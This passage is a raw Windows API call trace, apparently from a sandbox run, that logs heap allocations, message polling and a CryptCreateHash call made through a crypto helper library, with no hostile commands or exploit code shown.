hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0232.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0232.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0232.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0232.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0232.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0232.717] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.718] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0232.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0232.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0232.718] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0232.718] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0232.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0232.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0232.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0232.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0232.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0232.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0232.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0232.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0232.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e515b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0232.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0232.719] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0232.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0232.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0232.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0232.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0232.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0232.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0232.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0232.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0232.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0232.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0232.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0232.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0232.720] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0232.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0232.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0232.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0232.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0232.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0232.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0232.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0232.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0232.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0232.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0232.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0232.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0232.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0232.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0232.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0232.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0232.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0232.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0232.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0232.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0232.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0232.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0232.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0232.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0232.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0232.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0232.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0232.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0232.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0232.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0232.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0232.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0232.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0232.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0232.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0232.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0232.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0232.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0232.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0232.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0232.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0232.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0232.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0232.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0232.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0232.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0232.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0232.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0232.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0232.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0232.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0232.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0232.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0232.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0232.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0232.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0232.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0232.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0232.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0232.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0232.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0232.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0232.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0232.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0232.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0232.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0232.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0232.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0232.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0232.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0232.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0232.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0232.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0232.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0232.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0232.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0232.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0232.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0232.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0232.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0232.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0232.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55108 [0232.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0232.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0232.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0232.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0232.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55028, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0232.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0232.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0232.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0232.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0232.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0232.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0232.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0232.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0232.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0232.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0232.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0232.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0232.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0232.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0232.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0232.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0232.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0232.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0232.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0232.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0232.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0232.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0232.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0232.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0232.725] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0232.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0232.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0232.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0232.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0232.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0232.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0232.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0232.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0232.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0232.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0232.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f18 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0232.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0232.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0232.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0232.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0232.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0232.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0232.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0232.727] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0232.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0232.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0232.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0232.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0232.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0232.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0232.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0232.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0232.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0232.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0232.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.727] 